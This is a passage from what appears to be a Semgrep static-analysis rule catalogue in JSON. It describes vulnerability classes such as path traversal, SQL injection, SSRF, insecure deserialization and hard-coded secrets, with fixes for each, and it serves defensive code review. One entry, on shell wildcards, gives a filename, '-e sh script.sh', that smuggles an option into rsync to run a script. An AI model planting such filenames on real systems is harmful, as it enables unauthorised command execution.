[https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi","id":"python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi","name":"python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The return value of `$VAR.$NPOS_CALL(...)` has been modified so it can never equal `std::string::npos`. This could lead to an `std::out_of_range` exception being thrown or trigger an out-of-bounds read if the position is used as an array index."},"help":{"markdown":"The return value of `$VAR.$NPOS_CALL(...)` has been modified so it can never equal `std::string::npos`. This could lead to an `std::out_of_range` exception being thrown or trigger an out-of-bounds read if the position is used as an array index.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.std-string-npos.std-string-npos)\n - [https://wiki.sei.cmu.edu/confluence/display/cplusplus/CTR55-CPP.+Do+not+use+an+additive+operator+on+an+iterator+if+the+result+would+overflow](https://wiki.sei.cmu.edu/confluence/display/cplusplus/CTR55-CPP.+Do+not+use+an+additive+operator+on+an+iterator+if+the+result+would+overflow)\n","text":"The return value of `$VAR.$NPOS_CALL(...)` has been modified so it can never equal `std::string::npos`. This could lead to an `std::out_of_range` exception being thrown or trigger an out-of-bounds read if the position is used as an array index."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.std-string-npos.std-string-npos","id":"cpp.lang.security.strings.std-string-npos.std-string-npos","name":"cpp.lang.security.strings.std-string-npos.std-string-npos","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.std-string-npos.std-string-npos"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found user input going directly into typecast for bool(), float(), or complex(). This allows an attacker to inject Python's not-a-number (NaN) into the typecast. This results in undefind behavior, particularly when doing comparisons. Either cast to a different type, or add a guard checking for all capitalizations of the string 'nan'."},"help":{"markdown":"Found user input going directly into typecast for bool(), float(), or complex(). This allows an attacker to inject Python's not-a-number (NaN) into the typecast. This results in undefind behavior, particularly when doing comparisons. Either cast to a different type, or add a guard checking for all capitalizations of the string 'nan'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.nan-injection.nan-injection)\n - [https://discuss.python.org/t/nan-breaks-min-max-and-sorting-functions-a-solution/2868](https://discuss.python.org/t/nan-breaks-min-max-and-sorting-functions-a-solution/2868)\n - [https://blog.bitdiscovery.com/2021/12/python-nan-injection/](https://blog.bitdiscovery.com/2021/12/python-nan-injection/)\n","text":"Found user input going directly into typecast for bool(), float(), or complex(). This allows an attacker to inject Python's not-a-number (NaN) into the typecast. This results in undefind behavior, particularly when doing comparisons. Either cast to a different type, or add a guard checking for all capitalizations of the string 'nan'."},"helpUri":"https://semgrep.dev/r/python.django.security.nan-injection.nan-injection","id":"python.django.security.nan-injection.nan-injection","name":"python.django.security.nan-injection.nan-injection","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.nan-injection.nan-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a psycopg2 Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use prepared statements by creating a 'sql.SQL' string. You can also use the pyformat binding style to create parameterized queries. For example: 'cur.execute(SELECT * FROM table WHERE name=%s, user_input)'"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a psycopg2 Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use prepared statements by creating a 'sql.SQL' string. You can also use the pyformat binding style to create parameterized queries. For example: 'cur.execute(SELECT * FROM table WHERE name=%s, user_input)'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli)\n - [https://www.psycopg.org/docs/sql.html](https://www.psycopg.org/docs/sql.html)\n","text":"Detected string concatenation with a non-literal variable in a psycopg2 Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use prepared statements by creating a 'sql.SQL' string. You can also use the pyformat binding style to create parameterized queries. For example: 'cur.execute(SELECT * FROM table WHERE name=%s, user_input)'"},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli","id":"python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli","name":"python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of the wildcard character in a system call that spawns a shell. This subjects the wildcard to normal shell expansion, which can have unintended consequences if there exist any non-standard file names. Consider a file named '-e sh script.sh' -- this will execute a script when 'rsync' is called. See https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt for more information."},"help":{"markdown":"Detected use of the wildcard character in a system call that spawns a shell. This subjects the wildcard to normal shell expansion, which can have unintended consequences if there exist any non-standard file names. Consider a file named '-e sh script.sh' -- this will execute a script when 'rsync' is called. See https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.system-wildcard-detected.system-wildcard-detected)\n - [https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt](https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt)\n","text":"Detected use of the wildcard character in a system call that spawns a shell. This subjects the wildcard to normal shell expansion, which can have unintended consequences if there exist any non-standard file names. Consider a file named '-e sh script.sh' -- this will execute a script when 'rsync' is called. See https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt for more information."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.system-wildcard-detected.system-wildcard-detected","id":"python.lang.security.audit.system-wildcard-detected.system-wildcard-detected","name":"python.lang.security.audit.system-wildcard-detected.system-wildcard-detected","properties":{"precision":"very-high","tags":["CWE-155: Improper Neutralization of Wildcards or Matching Symbols","LOW CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.system-wildcard-detected.system-wildcard-detected"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found user-controlled request data being passed into a file open, which is them passed as an argument into the FileResponse. This is dangerous because an attacker could specify an arbitrary file to read, which could result in leaking important data. Be sure to validate or sanitize the user-inputted filename in the request data before using it in FileResponse."},"help":{"markdown":"Found user-controlled request data being passed into a file open, which is them passed as an argument into the FileResponse. This is dangerous because an attacker could specify an arbitrary file to read, which could result in leaking important data. Be sure to validate or sanitize the user-inputted filename in the request data before using it in FileResponse.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.request-data-fileresponse.request-data-fileresponse)\n - [https://django-book.readthedocs.io/en/latest/chapter20.html#cross-site-scripting-xss](https://django-book.readthedocs.io/en/latest/chapter20.html#cross-site-scripting-xss)\n","text":"Found user-controlled request data being passed into a file open, which is them passed as an argument into the FileResponse. This is dangerous because an attacker could specify an arbitrary file to read, which could result in leaking important data. Be sure to validate or sanitize the user-inputted filename in the request data before using it in FileResponse."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.request-data-fileresponse.request-data-fileresponse","id":"python.django.security.injection.request-data-fileresponse.request-data-fileresponse","name":"python.django.security.injection.request-data-fileresponse.request-data-fileresponse","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.request-data-fileresponse.request-data-fileresponse"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Call '.verify()' before using the token."},"help":{"markdown":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Call '.verify()' before using the token.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Call '.verify()' before using the token."},"helpUri":"https://semgrep.dev/r/javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify","id":"javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify","name":"javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify","properties":{"precision":"very-high","tags":["CWE-345: Insufficient Verification of Data Authenticity","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret","id":"python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret","name":"python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected MD4 hash algorithm which is considered insecure. MD4 is not collision resistant and is therefore not suitable as a cryptographic signature. Use a modern hash algorithm from the SHA-2, SHA-3, or BLAKE2 family instead."},"help":{"markdown":"Detected MD4 hash algorithm which is considered insecure. MD4 is not collision resistant and is therefore not suitable as a cryptographic signature. Use a modern hash algorithm from the SHA-2, SHA-3, or BLAKE2 family instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4)\n - [https://www.pycryptodome.org/src/hash/hash#modern-hash-algorithms](https://www.pycryptodome.org/src/hash/hash#modern-hash-algorithms)\n - [https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html](https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html)\n - [https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability)\n - [http://2012.sharcs.org/slides/stevens.pdf](http://2012.sharcs.org/slides/stevens.pdf)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n","text":"Detected MD4 hash algorithm which is considered insecure. MD4 is not collision resistant and is therefore not suitable as a cryptographic signature. Use a modern hash algorithm from the SHA-2, SHA-3, or BLAKE2 family instead."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4","id":"python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4","name":"python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"helpUri":"https://semgrep.dev/r/java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none","id":"java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none","name":"java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to store keychain items that leverage user authentication but allow the passcode fallback. Biometric modalities are considered more secure than 4 or 6 digit pincodes on iOS, and should be preferred over the passcode."},"help":{"markdown":"The application was observed to store keychain items that leverage user authentication but allow the passcode fallback. Biometric modalities are considered more secure than 4 or 6 digit pincodes on iOS, and should be preferred over the passcode.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication)\n","text":"The application was observed to store keychain items that leverage user authentication but allow the passcode fallback. Biometric modalities are considered more secure than 4 or 6 digit pincodes on iOS, and should be preferred over the passcode."},"helpUri":"https://semgrep.dev/r/swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback","id":"swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback","name":"swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback","properties":{"precision":"very-high","tags":["CWE-272: Least Privilege Violation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password)\n - [https://docs.rs/tokio-postgres/latest/tokio_postgres/](https://docs.rs/tokio-postgres/latest/tokio_postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password","id":"rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password","name":"rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"help":{"markdown":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string)\n - [https://rorsecurity.info/portfolio/ruby-on-rails-sql-injection-cheat-sheet](https://rorsecurity.info/portfolio/ruby-on-rails-sql-injection-cheat-sheet)\n","text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"helpUri":"https://semgrep.dev/r/ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string","id":"ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string","name":"ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.rocket.ssrf.reqwest-taint.reqwest-taint)\n - [https://docs.rs/reqwest/latest/reqwest/](https://docs.rs/reqwest/latest/reqwest/)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/rust.rocket.ssrf.reqwest-taint.reqwest-taint","id":"rust.rocket.ssrf.reqwest-taint.reqwest-taint","name":"rust.rocket.ssrf.reqwest-taint.reqwest-taint","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: rust.rocket.ssrf.reqwest-taint.reqwest-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl","id":"python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl","name":"python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"helpUri":"https://semgrep.dev/r/java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring","id":"java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring","name":"java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this."},"help":{"markdown":"Service '$SERVICE' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' 